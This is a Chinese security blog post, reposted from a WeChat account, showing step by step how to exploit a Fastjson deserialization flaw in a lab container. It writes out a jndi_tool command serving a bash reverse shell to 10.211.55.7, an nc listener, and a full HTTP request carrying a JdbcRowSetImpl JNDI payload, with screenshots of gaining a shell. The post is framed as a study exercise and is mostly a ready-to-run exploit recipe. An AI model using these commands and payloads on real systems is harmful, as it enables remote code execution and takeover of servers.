Fastjson漏洞反弹Shell之巧妙利用

admin 2022年7月21日01:27:36安全文章评论55 views1444字阅读4分48秒阅读模式




网安引领时代,弥天点亮未来   





 

Fastjson漏洞反弹Shell之巧妙利用

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!



Fastjson漏洞反弹Shell之巧妙利用

0x01背景介绍

Fastjson 是Alibaba的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。相信利用过Fastjson漏洞的XDM都知道,该漏洞利用需要编写Java利用代码,然后在编译为class文件,在通过rmi/ladp等远程加载实现漏洞利用。


Fastjson漏洞反弹Shell之巧妙利用

0x02具体操作

1.通过使用Vulfocus docker环境部署该漏洞
Fastjson漏洞反弹Shell之巧妙利用
 2.对响应数据做简单分析判断为json格式,然后使用yakit工具插件进行漏洞识别
Fastjson漏洞反弹Shell之巧妙利用
漏洞识别
Fastjson漏洞反弹Shell之巧妙利用
3.通过dnslog判断是否可以正常解析
Fastjson漏洞反弹Shell之巧妙利用
4.漏洞存在,然后进行巧妙的利用,下载jndi_tool工具
https://github.com/wyzxxz/jndi_tool
本地需要安装java环境,启动工具,并输入vps地址
java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "bash -i >&/dev/tcp/10.211.55.7/12388 0>&1"
Fastjson漏洞反弹Shell之巧妙利用
 nc监听端口
nc -lvvp 12388
Fastjson漏洞反弹Shell之巧妙利用
发送payload获取反向shell
POST / HTTP/1.1Host: 10.211.55.2:59619Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Length: 0Content-Type: application/jsonCookie: vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjU3NTM4NDk3LCJlbWFpbCI6IiJ9.w7B99Cl7zqST2Iatp0uAJoGRMZimQucf9bydS9l98voUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.211.55.7:1099/Object","autoCommit":true}}
Fastjson漏洞反弹Shell之巧妙利用
查看监听端口,获取shell
Fastjson漏洞反弹Shell之巧妙利用

推荐阅读

Web安全零基础速成培训班

Android APP开发零基础速成培训班

Android APP逆向分析零基础速成培训班

Android10系统定制之frida逆向分析速成培训班

零基础学编程/零基础学安全/零基础学逆向实战速成培训班


Fastjson漏洞反弹Shell之巧妙利用

原文始发于微信公众号(哆啦安全):Fastjson漏洞反弹Shell之巧妙利用

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月21日01:27:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Fastjson漏洞反弹Shell之巧妙利用 https://cn-sec.com/archives/1179110.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: